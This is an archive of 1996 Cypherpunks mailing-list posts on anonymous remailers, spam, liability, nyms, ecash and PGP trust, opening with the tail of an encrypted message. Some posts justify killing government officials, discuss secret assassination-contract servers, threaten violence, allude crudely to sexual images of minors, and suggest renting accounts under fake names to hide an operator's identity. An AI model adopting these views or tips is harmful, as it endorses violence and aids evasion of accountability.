OuYN9knPNgNhKdIFQFi6pTd19L/EW2wIs8SXz+7F3EYdHu9N+F9+9izQsrmzm1+e
/FxX4aWbOw85TnaTQhrrr6+ylFxFswjYcUvhZkZFzkgtK7wOzcHVPZb0+XJajW7U
4z4JZvhfrDFXODsp9kJkJK2IargWEsZESS8IytShI3gKr2BLLkGtIWROntE3L31C
EvKd8eTym/owFByvNku27ESRdWsomnDK0vdgPK9i1IN2SCXdIZiPfY3hW1nwrUU7
XfzlaDmowCfzKfhuW4RC6KQ1Bc8o3X7J8RsEWenGpNeX+LRoGrpOfi+wURZb75ph
E9Q9DB7Lp+VG7/7uHnFSC3D8r+ypFEgS0kmbtgHtxwFNlngr1fT7k1KJW+pBxgoq
Vqz6J7LLHNh+MlhGMGwQhBQ9+4BofXko88aIZYuz9G7Y3l2E9WjL86siCuuGQpI8
HU/m4NosIPeZjNfKuk8f+T5aJGj+XTW3r1z60IQqmmAf0ATH3gJi6eaURrFgmwXD
2D5lrToQIAVM77Rz8bY3jQclPDses+p+j9QuuoKBTxmUfa+YFR6/e0eotddULr31
bBzX24SGBzXJ3uX3ySZJ2LEcrMg5HZiGDWGdvF31uhUsyvpPz5trLOINZQYGu41D
Sf7NVrBB0NXHJQ+144V9jxH8cuk3hcIJwhyKFrOSclhSQ5nztGCPuqG+POn/AH9Q
VeR40j0WrHwG63wV4rldTnaIoYsmW4DO2VvNp2eFPSQalOyHNzWE2kQtmnex+XZZ
l3Dt4FUiRhvim7S05vNrdOvwMfnL2+8M3QBJ0v1MHTc4pAmYyyO/c1wBxbKg5YD9
w5VUEtwu4IAmnnpgdK1/6opBPbPehXE6UX6Os5fFLwMRUfhdTFAOl9HMiWz6U0V2
Isx8hmMCix+/MCkYqzoxtxCLVNe53dhpAdKTJ2yZDAl7dR4WqhX0bIMXeIWQZOaE
S8DsrAtP385LdMNH+EYQrJuSQl4TKkRGAKTbsvjjFN3z6t3vGXK178vQe5MUTDZE
fh6qhfGBY/DLU5aq3eIhofZPcCiyeI+6wDWh2rcqyPjxynT3IoXQxJQwMyjGMScd
eLPQ776ZH1pNSDlQ3NO4yIGV0vwfaeq0bnCw6ypH4aHb8BMsdmkSYUOpAOFcj8US
htdxAGXQhxjABEwAppfScZBV74hUxYUtF2HETpUzS7gwlhkTqwI9Yg2X9abK/lIy
vYMCCe45t/4LmGufQrvKcIvvHOerB2kVlhDv4RhRE04G9S1QnO2u2L0djzT6KmBF
GvwnfTjBNqpvAOxlKw==
=aXfK
-----END PGP MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 19 May 1996 13:09:40 +0800
To: cypherpunks@toad.com
Subject: Rumor: DSS Broken?
Message-ID: <v0300660fadc40c0366dd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


This is a rumor. It is only a rumor. If you don't want to read a rumor,
please hit your "d" key now...

A wierd thing happened to me today.

I was talking to someone who was talking to someone (have I said this is a
rumor yet?) who was solicited for comment by a Very Famous Reporter about
the fact that  DSS, the Digital Signature Standard, promulgated by NIST, I
believe, had been broken.

I seem to remember people scoffing about it here when it came out, so news
of it's breaking is probably not a big deal to some of us. However, I
understand that people are shipping product and offering consulting
services based on DSS, and if the rumor is in fact true, there may be more
fun and games in the press about it...

Cheers,
Bob Hettinga




-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sun, 19 May 1996 16:40:47 +0800
To: CYPHERPUNKS@toad.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605171738.KAA05800@netcom9.netcom.com>
Message-ID: <199605190238.TAA20368@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! so list attention turns once again to a looming remailer "crisis"...

PLEASE TURN YOUR ATTENTION TO THE CONTINUING CRYPTO EMERGENCY

! where are there so few remailers? the reasons are pretty obvious.
! these problems have been transparently apparent from the very 
! beginning.
! 
! 1. there is no economic incentive.
! 
! as soon as there is a good economic incentive to run remailers, you
! will see them proliferate. but currently they have no virtually
! no value to the creator. it's like building a house for other people
! to live in out of humanitarianism. note that with web pages, you
! are buying free publicity for your company. but in fact you are
! typically buying yourself *negative* publicity by running a remailer.
! 
! what is the current incentive to run remailers? answer: adulation
! by other cypherpunks. hmmm, not necessarily all that motivating
! to very many.

WORKS FOR MEEEE

! 2. there is no good way to deal with spams or other so-called "abuse"

NETNEWS SPAM IS CAUSED BY MODERATION GET RID OF MODERATION TO END SPAM ONCE AND FOR ALL

! I commend the remailer operators for starting a mailing list to
! deal with spam. but the solution remains essentially "stop
! spam by hand". spammers still have the ability to be a serious
! threat to the network. this has been a threat from the beginning
! and has never been resolved. note that "spam avoidance" is a
! very, very difficult problem that plagues far more than remailers,
! such as mailing lists and usenet. but it is particularly acute
! with remailers.

USENET SPAM SAVES DISK SPACE ADMINS LOVE IT

! 3. liability
! 
! there is a lot of liability to the operator of a remailer, and
! again, this risk is totally unsupportable from their current
! returns (nil). Hal Finney recently suggested restricting posts
! from remailers to avoid copyright liability. this will limit
! the liability and risk but does not totally remove it.

THE BEST STUFF IS CUMMING FROM CRYPTO WANNA BEE ON INSIDE TRACK FOR CLEAR TEXT TEEN NUDES

! 4. no need for a network
! 
! in fact there is not really a need for a remailer network on one
! level. there is only a need if the service is not available. why
! is there only one anon.penet.fi? well, because of the above reasons,
! and also by the fact that only one is sufficient to serve all of
! cyberspace, virtually. what I mean is that there is easily enough
! traffic to justify another anon.penet.fi type remailer, but it's
! not totally critical (i.e. to the point that someone puts their
! resources where their mouth is) as long as anon.penet.fi is running.

THERE IS EXTREME UNDERCAPACITY FOR CRYPTO AND ANONYMINITY

! 5. etc.

ETC

! ==
! 
! if people want to know why remailers haven't proliferated  in
! the same way that other cyberspace infrastructure has in the
! past, such as news servers and web sites, you have to focus on
! the above issues. remailers are NOT like other cyberspace services.
! they are a tremendous burden to run, instead of being of high
! use to the maintainer (even though they don't generate cash)
! in the way a web page or usenet server is.

INCORPORATE AND SELL ADVERTISING SPACE IN THE SIG THE COOLEST PEOPLE GET ANONYMOUS MAIL POSTS THERE IS A VAST UNTAPPED SOURCE OF REVENUE GUNS DRUGS CRYPTO PYRO PORN PERSONALS ETC INFORMATION WANTS TO BE PAID FOR

! the main problem, getting cash for the service, is slowly dissolving
! to the point that it will not be an obstacle. I predict that 
! remailers (and many other unusual services) may begin to proliferate
! at that point-- but not as much as other areas of cyberspace such
! as the web. remailers are always going to be plagued by the other
! problems I mentioned above unless some really brilliant genius
! comes along to solve what seems to be the unsolvable.

INCORPORATE AND SELL ADVERTISING SPACE IN THE SIG THE COOLEST PEOPLE GET ANONYMOUS MAIL POSTS THERE IS A VAST UNTAPPED SOURCE OF REVENUE GUNS DRUGS CRYPTO PYRO PORN PERSONALS ETC INFORMATION WANTS TO BE PAID FOR

! another tact the cypherpunks might take to get anonymity into 
! the cyberspace infrastructure is to target forum architecture.
! instead of trying to create remailers that "feed into" other
! networks, why not build in remailers into those networks themselves?
! I am thinking of the way NNTP could be a massive anonymous 
! remailer network, and that in fact it was once but that this
! was purposely designed against in the protocol (preventing people
! from anonymously submitting articles to NNTP hosts).

BUT IN THE MEAN TIME WE WANT MORE SERVERS

! I propose that as long as there are serious elements involved
! in building up cyberspace that are hostile to anonymity, you
! are not going to see it flourish in the way other services have.
! it seems to me the major obstacles to widespread anonymity
! are perceptual, not technological. if people can find a way

WE WANT OTHERS TO DO THE WORK FOR US

! to handle the above issues and still provide anonymity, it will
! spread. otherwise, I doubt it will ever become very "mainstream".
! perhaps the above problems are intrinsic to anonymity, which would
! be a pity in my view.
! 
! BTW, TCM laments that he hasn't seen master's thesis on remailers.
! I consider Lance Cottrell's mixmaster work to be really on that
! level, and highly commendable. LC has really advanced remailer
! technology by tremendous leaps and bounds since putting his mind
! to it. also Levien's remailer page is another very outstanding
! service. it is possible that all the real research into remailers
! is being done at the NSA <g>
! 
! seriously, though, I think cpunks have an opportunity to do some
! introspection here. it seems a pretty good rule in cyberspace that
! "cool and useful services flourish and grow". witness Usenet
! and the web. why haven't the cpunks been able to tap into that
! kind of exponential force with remailers? the problems are not
! merely technological. I would say the technological problems
! associated with the remailers are the most straightforward to
! solve. its the complex social issues that are seemingly insurmountable.
! 
! I really believe that if anyone wants to get more anonymity in
! cyberspace, they must deal head on with the sociological 
! "anonymity taboo" in society. why is there a taboo in society
! against anonymity? could it be there are some good reasons for it?
! is it possible to create a "socially acceptable" anonymity? of
! course this line of thinking is going to be utterly repulsive
! to some on this list, but I contend it is essential to remailer
! growth strategy.
! 
! of course if people don't want remailers to ever go "mainstream"
! anyway, well then there is no problem. the remailer network still
! has an "underground" feeling to it and perhaps that will always
! be part of its draw, and its actual structure.

ANYONE FUCK WITH MY REMAILER AND I SUMMON TEN SKINHEADS TO BREAK OFF THEIR DICK









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Sun, 19 May 1996 15:58:54 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605171738.KAA05800@netcom9.netcom.com>
Message-ID: <Pine.BSF.3.91.960518183037.484A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> 1. there is no economic incentive.
[snip]
> typically buying yourself *negative* publicity by running a remailer.

As you said, ecash postage could turn that around. The negative publicity
part is probably the result of the general public's negative perceptions
about anonymity. 

People seem to forget that anyone can drop a letter into the mailbox with
no return address. Did the Unabomber bring negative publicity to the 
postal service, causing people to demand that return addresses become a 
requirement? :-/

> 2. there is no good way to deal with spams or other so-called "abuse"

Unfortunately, abuse is also a factor in people's negative perceptions
about anonymity. 

I wonder, would the average spammer be less likely to spam if he had to
PGP-encrypt messages to the remailer? I know we want to make remailers
easy to use and not limit them to the technologically elite, but requring
encryption would have the added benefit of improving security. I believe
some remailers already require encryption; have any Spam Statistics been
gathered? 

Ecash postage might discourage the average spammer, unless that spammer
has deep pockets. With postage, the only spam I can think of that would
gain money or break even is a commercial advertisment, and there's no
point to using remailers for commercial ads anyways, since people need to
know how to contact the business. 

> 3. liability

Liability depends on the jurisdiction, doesn't it? It would be ideal if
all remailers were in countries where there are no laws that would affect
remailers. Reducing liability also has the added benefit of protecting
anonymity, since if the mailer can't be siezed, that does prevent log
files (if any) from being siezed.

Do any such countries exist???

Also, if a remailer could be set up to _only_ remail to other remailers,
that would greatly reduce liability. Obviously we'd still need _some_
remailers that can deliver to the intended destination... I think a lot 
of people would be more willing to run remailers if it didn't mean that 
mailing list/usenet spam would have their name attached. 

Remailers can already be set up _not_ to send to certain addresses, so I 
think there's no reason that they couldn't be set to deliver _only_ to 
other remailers.

[kersnip]
> are perceptual, not technological. if people can find a way
> to handle the above issues and still provide anonymity, it will
> spread. otherwise, I doubt it will ever become very "mainstream".
> perhaps the above problems are intrinsic to anonymity, which would
> be a pity in my view.
[butchered for brevity] 
> of course if people don't want remailers to ever go "mainstream"
> anyway, well then there is no problem. the remailer network still
> has an "underground" feeling to it and perhaps that will always
> be part of its draw, and its actual structure.

Right now, I think, remailers don't need to be mainstream, they just need
to be there when people need them. And I think they can become mainstream,
if you consider that anon.penet.fi is quite popular. 


Just my two bits.

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Sun, 19 May 1996 16:50:37 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: Remailers vs Nyms - conflicting assumptions?
In-Reply-To: <2.2.32.19960518184824.006cded8@mail.aracnet.com>
Message-ID: <319E9122.287B3BEF@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Baugh wrote:
> 
> I've been enjoying the discussion of "disposable" remailers, but I note a
> problem. If this has been addressed before, well, now it's being noted again.
> 
> In my (admittedly limited) experience with nym servers, the reply path is
> fixed - it goes through specified hops. This creates A Problem when any one
> of the remailers involved goes down. There's no way for the mail to get
> through. There's not even a way for the nym holder to verify that there is a
> site down, as opposed to some more transitory problem, without information
> from an external source.
> 
> This seems to me a fairly serious weakness, given prevailing governmental
> attitudes.
> 
> What would it take to create a nym server that could route around the death
> or disability of any given mailer?

Well, that would be a serious problem. The big question is: who decides
the routing? With the existing nym setup, the client decides the entire
route. The nymserver knows only the first hop. For the nymserver to be
able to route around damage, it would have to know that there is damage,
and that implies knowing the route.

One fix for the problem is just to refresh your nym regularly. If you
are lucky enough to be using premail, then just run "premail -makenym
nym@alpha". I'm considering adding code that automatically figures out
which nyms need to be refreshed when a remailer drops in the reliability
ratings and automatically does it, but that probably won't make it into
the next release of premail.

The fact that you can refresh nyms makes the problem you bring up much
less severe.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 19 May 1996 13:32:18 +0800
To: cypherpunks@toad.com
Subject: Reputation and anonymous companies
In-Reply-To: <9605181736.AB07651@cti02.citenet.net>
Message-ID: <Pine.LNX.3.93.960518200815.708A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 18 May 1996, Jean-Francois Avon wrote:

> Yes, but anonymity would prevent the easy build-up of reputation too:
> 
> If Joe Anon9876 say: "company ANON1234 Inc screwed me, how peoples
> will know that it is not a unscrupulous competitor trying to damage
> their reputation?
> 
> Now, if Joe Anon9876 decides to disclose to the public that his real
> name is John Doe to give more weight to his denounciation, and
> depending on wether or not his bosses *are* or are not crooks, he
> might very well get some sort of "prediction" on his head.
> 
> Now, Jim Bell's servers don't have to be completely public.  Suppose
> some servers were built so that the donation address would be known
> but the list of donation would be kept secret: Such server could
> thrive.  Most "donation" here would not be 2 bucks but rather 20,000
> bucks to ensure that the contract would get taken up promptly.  And
> since the targets would not be published, there would be not even a
> hint that company ANON1234 *might* have put a contract on John Doe
> (Now, aka Joe Anon9876) .  The fact that an open AP server exists
> makes the later possibility also possible.  To have access to the
> target list would require to be member of a *very* close circle, or
> maybe, actually, just en employee of ANON_KILLERS4567_Inc.

You are right about the anonymity part -- I hadn't thought about it that much.
However, how would AP solve anything?  If the company is completely anonymous,
then nobody would know who to kill.  Every worker including the president would
be pseudonymous.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMZ5nkLZc+sv5siulAQHr9AP9HhipvicY7kr2WZ/Y2yKYrVMQOEXCTHLO
9jnrl5ujC7+2HheGszgJ7FsI9O8eTyM1Z/Q/jEmHDx0etVa7ffVndZSC2l2WqpoG
fIfz4Ua7PHReiu0pZbfWqY//00OgJP/smzGo06ZndCX5Osu4R+dHUd7LhYqsm9Jv
R/pMNOnrJco=
=XKTM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 19 May 1996 15:42:26 +0800
To: cypherpunks@toad.com
Subject: Re: TCM: mafia as a paradigm for cyberspace
In-Reply-To: <199605181943.MAA11760@netcom12.netcom.com>
Message-ID: <Pine.LNX.3.93.960518200508.1623B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 May 1996, Vladimir Z. Nuri wrote:

> an interesting thesis, quite revealing. "the mafia is fulfilling a 
> valid market purpose. the killings & violence are just minor secondary
> issues."  I believe in contrast I would define the mafia exactly
> the opposite. the violence and terror is the key part of the mafia agenda.
> the activities they involve themselves in are secondary to promoting
> the basic agenda of obtaining money in any way possible. how can you

	Replace "mafia" with government, and "money" with power/control.  

> what amazes me about people who tend to have a warped mindset is that
> they think new technology, such as cyberspace, creates a new morality.
> suddenly murdering, violence, drug dealing, or whatever are supposedly
> thrust into some new reality in which old rules no longer apply.
> you and Jim Bell are unbelievably similar, as much as either of you
> would hate to admit it. its just a cloak, in my opinion, for trying
> to evade culpability. the ultimate utopia for some on this list would
> be a world in which they can be held accountable for absolutely nothing,
> by absolutely no one. "anarchy" is as good a word as our reality can
> come close to, although I believe such a reality would be far more
> sinister than that adjective connotes.

	Who says a _new_ morality? Maybe it is just a wider expresion of
an already extant morality. If you will accept the defination of Murder
being "immoral killing", then most people really don't have a problem
with killing. They just draw the line between murder and killing in
different places. To me, killing is justified in 2 circumstances. 1) If
the [man animal]s threat potential exceeds a certain limit (variable) or
2) food/warmth is needed and will be derived from said killing. To kill
randomly or indiscrimantely, wether man or animal is Murder (i.e. immoral
killing) to me this _does_ include trophy hunting, but not if you utilize
the animal for food etc.
	Where humans are concerned, killing them for food is rarely an
issue, but they often present some sort of threat potential. Certain
pepole in government approach this threat potential. Thus, to me, killing
them isn't immoral, but it could _legally_ (i.e. a different defination)
be murder. 

	As far as I am concerned there really is no difference between the
government and the mafia. Both use the same threat to accomplish their
ends, the Mafia is just more honest about it. Both suck. Out loud. The
mafia just tends to be better run, and less invasive personally until you
violate their rules.  

> think about it really hard, TCM. work out those difficult problems
> associated with trying to kill people and get away with it, using
> new sexy advances in technology and theory. you

	Why do you need new technology? The old stuff works just great.
You just need the new stuff to hide you from the feds. 

> maybe talk to Jim Bell some more. perhaps
> eventually you will perfect the method of perpetrating the perfect
> killing!! I really do admire you, because killing people without
> getting caught is surely a great unrecognized art, and one of the
> most unappreciated and misunderstood.

	Happens all the time. 

> something that has only been a dream to the blighted
> wretches prior to our glorious new phases of cyberspatial technology, 
> which makes human morality completely obsolete.

	I am getting the impression that this last sentence was a little
sarcastic? 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 19 May 1996 15:42:30 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <199605182050.NAA14663@netcom9.netcom.com>
Message-ID: <Pine.LNX.3.93.960518202614.1623C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 May 1996, Dave Harman wrote:
> YES YES YES!!!!!!
> SLIP/PPP/SHELL IT DOESN'T MATTER, DOWNLOAD MAIL, PROCESS, UPLOAD, MAIL, POST!!!!!
> LINUX MODEM/CUA1 OR SLIP/PPP!!!!!!!!
> PAID WITH *FAKE* NAME/ADDRESS WITH POSTAL MONEY ORDER!!!!!!

	Don't yell at me. I get very pissed when people yell at me.
Yelling at people only closes their minds. 

> I SUCK, I DON'T CODE!!!!!!

	We could care less about your sex life, and I can't code well
either. What one has to do with the other is beyond me. 

	Besides, I don't think it takes a whole lot of coding beyond:

	patch  < the.patch | make all 

	or whatever. The difficult part (if any) is the adminstration.

> IF THEY WONT GIVE YOU "FROM: " AND 50 POSTS/500 EMAILS A DAY GET ONE THAT WILL!!!!!!
> THIS IS A CYPHER EMERGENCY!!!!!!!!
> WE NEED 1,000 SERVERS F A S T!!!!!!!!!!!!!!
> POSTAL COUPONS AND FOREIGN ACCOUNTS!!!!!!!!!!!!!
> WE NEED SERVERS NOT CLIENTS!!!!!!!
> THE USER/CLIENT DOES THIS SORT OF STUFF!!!!!!!!!!!!
> WE DON'T NEED ANYTHING BUT 1,000 WORLD HACKTIC STYLE REMAILERS!!!!!!!!!!!

	And a clue as to the location of the caps lock key. 

	Does this mean I have to give up my title as resident idiot?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 19 May 1996 15:19:34 +0800
To: CYPHERPUNKS@toad.com
Subject: Re: "Too cheap to meter"
In-Reply-To: <199605182056.NAA15181@netcom9.netcom.com>
Message-ID: <Pine.LNX.3.93.960518203050.1623E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 May 1996, Dave Harman wrote:
> 
> CAPITALISTS' SUCK

	Capitalists took this 'net from a government/educational 
/military-industrial complex playground to what it is today. I prefer
being able to use it without being apart of any of the above.

HTH. HAND. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 19 May 1996 13:49:16 +0800
To: cypherpunks@toad.com
Subject: Re:  Why does the state still stand:
In-Reply-To: <199605161419.HAA05109@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.93.960518203622.783B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 16 May 1996, Hal wrote:

> We have discussed for-pay remailers and the consensus has been that no
> one would use them when others run for free.  However now I think the
> false premise is being exposed, that free remailers simply will not be
> able to run in the current mode for much longer.  Once a single remailer
> operator has been fined thousands of dollars because somebody posted some
> copyrighted message, I don't think you will find many people eager to
> sign up as operators.  So this dream of a volatile collection of
> remailers popping up and going away just doesn't work in my view.  Why
> would anyone offer a service knowing that he was exposing himself to
> liability like this?  It would be just a game of Russian roulette,
> waiting to see whether it is your remailer which gets the bullet in the
> form of a post which violates the copyright of someone with deep
> pockets.

It is possible for someone to operate an anonymous remailer anonymously.
Just get a UNIX shell account under a fake name, pay with cash, and set up
the remailing software.  The identity of the operator of such a remailer
would be difficult, if not impossible, to discover.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMZ5ts7Zc+sv5siulAQH2QwQAn0xEONohrZ0Eoj5MMxL8NS/i/G48U5nR
1uLI2PXeBBbCSJQ5SXxp/4JoOZR13NkaIhAwBaCAcJRRV1AKa+f9xuK4wwbrqElg
ud24RRn7zf7H4HPkFSZF8uqQK/y7jjsJdhvtlVytyAKp4TnnkuGH8K1b44aW5OgM
wgbaT6UNiCw=
=Y4kV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 May 1996 17:28:32 +0800
To: Marc Escalier <cypherpunks@toad.com
Subject: Re: PLEASE HELP ME GO OUT OF THIS LIST!!!!!!
Message-ID: <adc3f3bd060210040b92@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:14 PM 5/18/96, Marc Escalier wrote:
>how to go out of this list.
>please help me, it would be VERY NICE.


Thanks to recent legal inquiries by the Church of Scientology, they have
determined that Major Domo, believed to be an army officer stationed at
Fort George Meade, Maryland, is the control officer for the Cypherpunks
mailing list.

The Scientologists have determined that Major Domo works in "Terminal
Operations Access Division," or "T.O.A.D." By sending a message to
majordomo@toad.com, with the body messsage of  "unsubscribe cypherpunks"
(without the quote marks), Major Domo may choose to take pity on you and
remove you. Of course, his superior, Colonel Mode, may insist you remain on
the list.

--Klaus! von Future Prime

THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 19 May 1996 09:52:36 +0800
To: cypherpunks@toad.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
Message-ID: <199605182017.WAA07561@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

You know, even though current ecash uses on-line clearing, it is
only necessary for the _payee_ to be on-line at that time.  Thus
it is entirely possible with current ecash for a payer to load 
his portable computer up at home with e-coins and then make a 
purchase a convenience store on the way to work _without_ having
a networkable computer.  Well-- I mean the computer needs to 
communicate with the convenience store, but it doesn't need 
full-scale Internet access.


Does anyone on cpunks or ecash have an Apple Newton?  I know
that they come with infrared-- what are the specs on that
communications device?  And about the Newton itself:  can it
compile ANSI C code?  How much RAM?  Permanent storage?  Speed
of crypto operations?


Thanks,

Bryce

#include <stddisclaimer.h> /* I don't speak for anyone but myself. */
- -----BEGIN GOODTIMES VIRUS INNOCULATION-----
Copy me into your .sig for added protection!
- ----- END  GOODTIMES VIRUS INNOCULATION-----



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZ4wY0jbHy8sKZitAQG/TAMAlF1WftbM8UT1+AUvZJBuX7BimZUOtRqg
2vWYVW2ADuKvntXdsDV0NqSq05/sqDZmhh/iOUmB6bWl22FUrwBbzk2gedUbB1w2
330B6pa1IU1Q5IluNIE2IKFkMZ/KHJ9m
=5W5l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 19 May 1996 09:54:11 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Senator, your public key please?
In-Reply-To: <adc35872010210048f5e@[205.199.118.202]>
Message-ID: <199605182038.WAA09047@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 The entity calling itself Tim May <tcmay@got.net> is alleged to have
 written:
>
> Keys, key signings, and webs of trust can be used in all sorts of ways.
> 
> And I expect the "burrowcrats" will try to regulate the use.
> 
> Imagine, for example, if I use a "web of trust" to help me decide who's
> trustworthy enough to negotiate the sale of my house to.
> 
> Further imagine that I want to see keys signed by Tom Metzger, my buddy
> from the Aryan Nations. Guess what? No blacks will have their keys signed,
> and hence I'll have to tell them, "Sorry, you're just not in my web of
> trust."
> 
> (Now, this is a hypothetical, meant to show that use of a web of trust can
> trigger such decisions, and could thus trigger legal challenges.)
> 
> The web of trust may not be transitive, but the "web of taint" may be more so.
> 
> New forms of blackballing, blacklisting, redlining, etc.
> 
> And I fully expect that who signs one's keys, and whose signatures are
> found on one's keys, may become a political and legal issue in the coming
> years.
> 
> What if, for example, Sen. Leahy _did_ end up in the web of trust for Aryan
> Nation? Even if he never intended it, this could have some severe PR
> repercussions.
> 
> An exciting new world we're entering.


All of these are products of misconceptions between using the 
WoT to certify identities, versus using it to certify how much 
you trust a person to certify someone else's identify, versus 
using it to certify arbitrary other qualities about a person.


For example, there is no reason why the hypothetical racist "Tom
Metzger" would sign no black people's keys.  A key signature
(PGP style) is just an assertion about the identity of someone.
Haven't racists engraved markings on people's clothes,
buildings, land, bodies and other belongings in order to
identify the owners?  So why not do the same for keys.


This is illustrative of how much confusion reigns about keys,
certs, nyms, signatures and cetera right now.


I hope that TCMay is pointing out how _most_ people lack a 
proper understanding of the differences, rather than reflecting
his own lack of understanding.


Phil Zimmermann was confused about this, I think, when he wrote 
"Trust is not transitive.".  Some kinds of trust _are_ 
transitive (with a coefficient, of course).  Hm.  I wonder if 
there are kinds of trust whose transitivity coefficient is 1?



Regards,

Bryce

#include <stddisclaimer.h> /* I don't speak for anyone but myself. */
- -----BEGIN GOODTIMES VIRUS INNOCULATION-----
Copy me into your .sig for added protection!
- ----- END  GOODTIMES VIRUS INNOCULATION-----




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: http://www.c2.net/~bryce/ -- 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZ41LkjbHy8sKZitAQHvRwL/Qakezx7VlPRahLnHx/7vuK56pLOScjeH
uxF7fX7mXRHKThcnM4fcU/nJ4I6xGNjvYi8RZpSTnhIzUUEiBrDPKE6M1lcqbynC
1H8/L50tGljPyBsJFfIvdHQ3vGKKUtwH
=iG/i
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sun, 19 May 1996 18:13:22 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <2.2.32.19960519053907.006ceda4@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:06 PM 5/18/96 -0700, Dimitri Vulis wrote:

>hence my comments from here from time to time that the technological
>problems of anonymity are not the true obstacle to widespread use. 
>there are deeper problems that cpunks skirt around but fail to grasp
>because of numerous prejudices. 

While I hate to lend support to anyone as much a twit as Vulis is, he's got
a point here. I don't think most cypherpunks realize how anonymity is
